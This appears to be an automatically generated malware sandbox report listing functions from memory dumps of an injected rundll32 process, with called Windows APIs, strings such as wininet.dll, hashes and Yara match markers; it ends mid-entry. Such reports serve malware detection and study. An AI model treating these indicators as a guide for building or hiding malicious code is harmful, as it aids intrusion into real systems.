Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction ID: 912b176e40ff960f72b5fecdf86f1809e7b293b1facc53f96482c068ffde14ee
Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction Fuzzy Hash: 0CF01CB5200218ABCB14DF89DC41E9B77ADAF88750F018108BE0997241C630F810CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 003EC86A Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(003E723E,00000206,?,003E723E,00000005,FFFFFFFF), ref: 003EC895

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1e0617ef605eb439bd812b39327bc1073ee51fd371afa2b78fe9f167b7123449
Instruction ID: a5710a9097a9d33c01e29a5ff599fa4624ae7c5a5e09c674fb7c5f7e1e0dcbfc
Opcode Fuzzy Hash: 1e0617ef605eb439bd812b39327bc1073ee51fd371afa2b78fe9f167b7123449
Instruction Fuzzy Hash: 15E08CB1A00210BBDB24DBB8CC49EDB7BA8DF48250F0141A6BA0D9B242C630E901CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EC870 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(003E723E,00000206,?,003E723E,00000005,FFFFFFFF), ref: 003EC895

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction ID: c770672ce05c607f9c2432be7936187207b3e3af2c6fcd18ea8d4142c5ffbb83
Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction Fuzzy Hash: F3D01776200214ABD624EBA9DC89E9B7BACDF48660F014155BA0D5B282CA30FA008AE1

Uniqueness

Uniqueness Score: -1.00%

Function 003EC840 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(003E7062,00000206,?,003E7062,00000005,00000018,?,?,00000000,00000206,?), ref: 003EC865

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
Instruction ID: c4486bfd621978a96accffc89c48080e5fc9daa8273e371e978f09b1b2e305ca
Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
Instruction Fuzzy Hash: D3D01776200214ABD720EB99DC89E977BACEF48760F114555BA0D5B282CA30FA008BE1

Uniqueness

Uniqueness Score: -1.00%

Function 04529840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452984A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
Instruction ID: d13f3d3d0d33525fe4be4dd28af7a832662f26890c8c6f2d434483573a18d8e3
Opcode Fuzzy Hash: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
Instruction Fuzzy Hash: 4B900261292045527545B15944045074166B7E0687B91C012A1405A50C8566E86AF661

Uniqueness

Uniqueness Score: -1.00%

Function 04529860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452986A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
Instruction ID: 4dccd26cc39d52c8672fbc7d86233c8cc2fba3171933d9bc2fb73989efd917a9
Opcode Fuzzy Hash: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
Instruction Fuzzy Hash: 6890027125100813F111615945047070169A7D0687F91C412A0415658D9696D966B161

Uniqueness

Uniqueness Score: -1.00%

Function 04529540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452954A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
Instruction ID: b29610b91f9d3869451dfa8c52bd01758d00146856da6b81399bce423772e05a
Opcode Fuzzy Hash: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
Instruction Fuzzy Hash: DF900265261004032105A559070450701A6A7D5797751C021F1006650CD661D8757161

Uniqueness

Uniqueness Score: -1.00%

Function 04529560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452956A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67cf538b0b95da6cf89e9b1ce37bd5898c9ddf7226562b36240e6a2ca7feb6c0
Instruction ID: 06b89f871a0971c9b6b8fe45c2d93a44c48b47a02cfacbf3a1f71c930e900ef3
Opcode Fuzzy Hash: 67cf538b0b95da6cf89e9b1ce37bd5898c9ddf7226562b36240e6a2ca7feb6c0
Instruction Fuzzy Hash: 6A900265271004022145A559060450B05A5B7D6797791C015F1407690CC661D8797361

Uniqueness

Uniqueness Score: -1.00%

Function 04529910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452991A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
Instruction ID: c324a024072fcc2bef660928dc62e452dab71075663b4e6d26c0ea43b29ee4a0
Opcode Fuzzy Hash: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
Instruction Fuzzy Hash: 9F9002B125100802F140715944047460165A7D0747F51C011A5055654E8699DDE976A5

Uniqueness

Uniqueness Score: -1.00%

Function 045295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045295DA

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
Instruction ID: 0bc1ff4937e3ba340e7f1edb299a920f3251ced99a3d805916b077b2d53932e2
Opcode Fuzzy Hash: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
Instruction Fuzzy Hash: 5C9002A125200403610571594414616416AA7E0647F51C021E1005690DC565D8A57165

Uniqueness

Uniqueness Score: -1.00%

Function 045299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045299AA

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
Instruction ID: ec3bfbf4279e4b94579c097381f43948559d692bce8baf12a48c589efadc6b1b
Opcode Fuzzy Hash: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
Instruction Fuzzy Hash: D19002A139100842F10061594414B060165E7E1747F51C015E1055654D8659DC667166

Uniqueness

Uniqueness Score: -1.00%

Function 04529650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452965A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d31952984ae06274cfad80e1082a960d3fa5ef75f1006515c03640eb791fcd2f
Instruction ID: 336e4ed7a3b6e7742ae7074724a0b7253fbb49886378e8bc8e5b7111a24fd116
Opcode Fuzzy Hash: d31952984ae06274cfad80e1082a960d3fa5ef75f1006515c03640eb791fcd2f
Instruction Fuzzy Hash: 3E90027125504C42F14071594404A460175A7D074BF51C011A0055794D9665DD69B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04529A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04529A5A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
Instruction ID: 4cacdffea3d314c1e4881e09cef95e4391045ebdf61be52ec85a6537f7e6af1c
Opcode Fuzzy Hash: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
Instruction Fuzzy Hash: F190026126180442F20065694C14B070165A7D0747F51C115A0145654CC955D8757561

Uniqueness

Uniqueness Score: -1.00%

Function 04529660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452966A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a57ee7e5b50d91a9f6d601ab951dfa3fcd6e3c4196d2e573192ffafcee0b5c47
Instruction ID: 7dc497eaff9677bc7d1b56e9431d72fcf7187e7104dae95472cffe8082b36ed9
Opcode Fuzzy Hash: a57ee7e5b50d91a9f6d601ab951dfa3fcd6e3c4196d2e573192ffafcee0b5c47
Instruction Fuzzy Hash: E990027125100C02F1807159440464A0165A7D1747F91C015A0016754DCA55DA6D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04529610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452961A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26ac796da86bd39976a67a3ec15253b975b8dd263972ef7ac24cac1766100e2b
Instruction ID: 7c538085eb4296221452ff7a34a9fedebe0ca31360a61fc82e0165b4930ad55b
Opcode Fuzzy Hash: 26ac796da86bd39976a67a3ec15253b975b8dd263972ef7ac24cac1766100e2b
Instruction Fuzzy Hash: 3990027165500C02F150715944147460165A7D0747F51C011A0015754D8795DA6976E1

Uniqueness

Uniqueness Score: -1.00%

Function 045296D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045296DA

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
Instruction ID: 889d0e15bb47f286039b010a476c14fea61578d6442d5a2f9f29d4a3dcbbceb2
Opcode Fuzzy Hash: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
Instruction Fuzzy Hash: DE90027125100C42F10061594404B460165A7E0747F51C016A0115754D8655D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 045296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045296EA

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
Instruction ID: 4e10ca3a3fe42c049bad4bdfb89407ca5306be41b1c0c4dd460edf60ae3592d2
Opcode Fuzzy Hash: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
Instruction Fuzzy Hash: 8690027125108C02F1106159840474A0165A7D0747F55C411A4415758D86D5D8A57161

Uniqueness

Uniqueness Score: -1.00%

Function 04529710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452971A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
Instruction ID: 7a6e8ab3648808f6f4ac5afd6173953cf8fad3d23d233fd5c3e394cab7571a06
Opcode Fuzzy Hash: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
Instruction Fuzzy Hash: 7390027125100802F100659954086460165A7E0747F51D011A5015655EC6A5D8A57171

Uniqueness

Uniqueness Score: -1.00%

Function 04529FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04529FEA

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
Instruction ID: 59eafbbb9058fa4b32c821a5ab0951fdf15b27addcdce71b2efaeab1c22176fa
Opcode Fuzzy Hash: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
Instruction Fuzzy Hash: 5790027136114802F110615984047060165A7D1647F51C411A0815658D86D5D8A57162

Uniqueness

Uniqueness Score: -1.00%

Function 04529780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0452978A

Memory Dump Source

Source File: 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true

Associated: 00000010.00000002.780855345.00000000045DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_44c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
Instruction ID: 91b6eda25b6555d9c98beaf2d46df3b50950170664e9ff8f8351f0c14f28c05c
Opcode Fuzzy Hash: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
Instruction Fuzzy Hash: 1490026926300402F1807159540860A0165A7D1647F91D415A0006658CC955D87D7361

Uniqueness

Uniqueness Score: -1.00%

Function 003D8880 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d896e6fe5dc17b6e0c498585ad76bc058bbc0922dedff4e38e28e5582c259eed
Instruction ID: 7e04a0bc2b366b71efb8710d53dd1af9f45f9f211b9276f75497da6b62b3dffa
Opcode Fuzzy Hash: d896e6fe5dc17b6e0c498585ad76bc058bbc0922dedff4e38e28e5582c259eed
Instruction Fuzzy Hash: 1BA1B5B2D00219ABDB16DFA5DC42EEF77B8EF44304F04455EF509AB241EB70AA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 003D887F Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: dcb328fb54622f9d9e1bcf4587c6efe1b69c34fb2b357f3af8774a9600885044
Instruction ID: 0a9315e118dc51901de5a7695c24cb948b9b21115403e7204e29783541e59c8a
Opcode Fuzzy Hash: dcb328fb54622f9d9e1bcf4587c6efe1b69c34fb2b357f3af8774a9600885044
Instruction Fuzzy Hash: 4E71D9B2D00219AADB16EBA5DC42FEE77BCEF44304F04455EF50967241EB70AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 003E4D10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 003E4D27

Strings

@J7<, xrefs: 003E4D3B
iR>, xrefs: 003E4D18

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<$iR>
API String ID: 2538663250-4040212378
Opcode ID: 372ccdebb9f61449d57995efda5ebe70ac4e80e078291826edc112d69a4371dc
Instruction ID: 05a3ff183b1b9823df70956c7135866636d470fc245973cdee3520f587f6c53c
Opcode Fuzzy Hash: 372ccdebb9f61449d57995efda5ebe70ac4e80e078291826edc112d69a4371dc
Instruction Fuzzy Hash: 90315EB5A0021AAFDB11DFD9DC809EFB3B9FF88304B108659E515EB244D771EE058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E4D0D Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 003E4D27

Strings

@J7<, xrefs: 003E4D3B
iR>, xrefs: 003E4D18

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<$iR>
API String ID: 2538663250-4040212378
Opcode ID: 77136b8c64391dc936e6f735ef322b4d21c8257acaabf855bf5bcf6e32ec250f
Instruction ID: f86b6621d71b4cffa3b730d6b834e22d89821862b1b3f78fb84725e2d882b954
Opcode Fuzzy Hash: 77136b8c64391dc936e6f735ef322b4d21c8257acaabf855bf5bcf6e32ec250f
Instruction Fuzzy Hash: 38314FB5A0021A9FDB11DFD9DC809EFB7B9BF88304B108659E515EB244D771EE058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EB410 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 003EB4CB

Strings

net.dll, xrefs: 003EB48B, 003EB51A, 003EB4F2, 003EB4FE, 003EB526
wininet.dll, xrefs: 003EB472, 003EB47E

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 79975bfdf89df732e7affc5dae3454abf5facccbdd86d58cabb66a4ccc1affbc
Instruction ID: a825b28b8f56ee03369f1dd6ed0f7e14471c9d4b3c3af3dc23043c586e70c96a
Opcode Fuzzy Hash: 79975bfdf89df732e7affc5dae3454abf5facccbdd86d58cabb66a4ccc1affbc
Instruction Fuzzy Hash: 993190B5600205ABC716DFA5D881FA7F7FCAB48700F10862EF65E5B285D770B644CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EB404 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 003EB4CB

Strings

net.dll, xrefs: 003EB48B, 003EB4F2, 003EB4FE
wininet.dll, xrefs: 003EB472, 003EB47E

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a86cc2ccaf3eb394744d0c3c47a64e02fa29df54281f4714aa603ce6f86f94d0
Instruction ID: bfa1b9b36072da0f8f60df4f98584124c975a31ba1d7f89a52c3f0814fbc4438
Opcode Fuzzy Hash: a86cc2ccaf3eb394744d0c3c47a64e02fa29df54281f4714aa603ce6f86f94d0
Instruction Fuzzy Hash: 6B31C2B5A00305ABD716DFA6D8C1FA7F7F8EB44700F10826EF65D5B285D77066448B90

Uniqueness

Uniqueness Score: -1.00%

Function 003ECB55 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,003DDC42,003DDC42,?,00000000,?,?), ref: 003ECBE0

Strings

L: , xrefs: 003ECB6C

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID: L:
API String ID: 3899507212-2550551303
Opcode ID: 690f9a6174a44e32f07655045d01a078ab055fb228b980317b5f9e3684358dcf
Instruction ID: 3f0161c2c21dbe71910a9b5831aeb4114a5a5c0082adcb6aeb7ed3fe2c88f9f4
Opcode Fuzzy Hash: 690f9a6174a44e32f07655045d01a078ab055fb228b980317b5f9e3684358dcf
Instruction Fuzzy Hash: D0F03CB52102087FDB14DF99EC81DE777ADEF88750F118619FA4997240C631E8118BE0

Uniqueness

Uniqueness Score: -1.00%

Function 003D7630 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 003D768A
PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 003D76AB

Memory Dump Source

Source File: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3d0000_rundll32.jbxd

Yara matches

